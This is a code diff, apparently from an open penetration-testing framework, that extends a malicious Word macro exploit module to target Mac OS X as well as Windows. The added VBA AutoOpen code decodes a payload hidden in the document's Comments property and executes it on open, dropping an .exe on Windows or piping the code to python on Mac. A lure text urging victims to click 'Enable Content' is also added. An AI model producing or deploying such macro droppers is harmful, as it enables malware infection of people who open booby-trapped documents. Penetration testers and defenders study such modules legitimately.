Support OS X for Microsoft Office macro exploit

Author: wchen-r7

data/exploits/office_word_macro/word/vbaData.xml

@@ -1,2 +1,2 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/office_word_macro/word/vbaProject.bin

@@ -1,3 +1,5 @@
+Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
+
 Sub AutoOpen()
     On Error Resume Next
     Dim found_value As String
@@ -6,17 +8,31 @@ Sub AutoOpen()
         If prop.Name = "Comments" Then
             found_value = Mid(prop.Value, 56)
             orig_val = Base64Decode(found_value)
-            Set fso = CreateObject("Scripting.FileSystemObject")
-            tmp_folder = fso.GetSpecialFolder(2)
-            tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
-            Set f = fso.createTextFile(tmp_name)
-            f.Write (orig_val)
-            f.Close
-            CreateObject("WScript.Shell").Run (tmp_name)
+            #If Mac Then
+                ExecuteForOSX (orig_val)
+            #Else
+                ExecuteForWindows (orig_val)
+            #End If
+            Exit For
         End If
     Next
 End Sub
 
+Sub ExecuteForWindows(code)
+    On Error Resume Next
+    Set fso = CreateObject("Scripting.FileSystemObject")
+    tmp_folder = fso.GetSpecialFolder(2)
+    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
+    Set f = fso.createTextFile(tmp_name)
+    f.Write (code)
+    f.Close
+    CreateObject("WScript.Shell").Run (tmp_name)
+End Sub
+
+Sub ExecuteForOSX(code)
+    system ("echo """ & code & """ | python &")
+End Sub
+
 
 ' Decodes a base-64 encoded string (BSTR type).
 ' 1999 - 2004 Antonin Foller, http://www.motobit.com
@@ -27,31 +43,23 @@ Function Base64Decode(ByVal base64String)
   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
   Dim dataLength, sOut, groupBegin
 
-  'remove white spaces, If any
   base64String = Replace(base64String, vbCrLf, "")
   base64String = Replace(base64String, vbTab, "")
   base64String = Replace(base64String, " ", "")
 
-  'The source must consists from groups with Len of 4 chars
   dataLength = Len(base64String)
   If dataLength Mod 4 <> 0 Then
     Err.Raise 1, "Base64Decode", "Bad Base64 string."
     Exit Function
   End If
 
 
-  ' Now decode each group:
   For groupBegin = 1 To dataLength Step 4
     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
-    ' Each data group encodes up To 3 actual bytes.
     numDataBytes = 3
     nGroup = 0
 
     For CharCounter = 0 To 3
-      ' Convert each character into 6 bits of data, And add it To
-      ' an integer For temporary storage.  If a character is a '=', there
-      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
-      ' the whole string.)
 
       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
 
@@ -69,18 +77,14 @@ Function Base64Decode(ByVal base64String)
       nGroup = 64 * nGroup + thisData
     Next
 
-    'Hex splits the long To 6 groups with 4 bits
     nGroup = Hex(nGroup)
 
-    'Add leading zeros
     nGroup = String(6 - Len(nGroup), "0") & nGroup
 
-    'Convert the 3 byte hex integer (6 chars) To 3 characters
     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
 
-    'add numDataBytes characters To out string
     sOut = sOut & Left(pOut, numDataBytes)
   Next
 

external/source/exploits/office_word_macro/macro.vba

@@ -36,18 +36,30 @@ def initialize(info={})
           'EXITFUNC' => 'thread',
           'DisablePayloadHandler' => true
         },
-      'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Microsoft Office Word', {}],
+          [
+            'Microsoft Office Word on Windows',
+            {
+              'Platform' => 'win',
+            }
+          ],
+          [
+            'Microsoft Office Word on Mac OS X (Python)',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Jan 10 2012",
-      'DefaultTarget'  => 0
+      'DisclosureDate' => "Jan 10 2012"
     ))
 
     register_options([
-      OptString.new("BODY", [false, 'The message for the document body', '']),
+      OptString.new("BODY", [false, 'The message for the document body',
+        'Contents of this document are protected. Please click Enable Content to continue.'
+      ]),
       OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
     ], self.class)
   end
@@ -60,8 +72,9 @@ def on_file_read(short_fname, full_fname)
     when /document\.xml/
       buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
     when /core\.xml/
+      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
       b64_payload = ' ' * 55
-      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
+      b64_payload << Rex::Text.encode_base64(p)
       buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
     end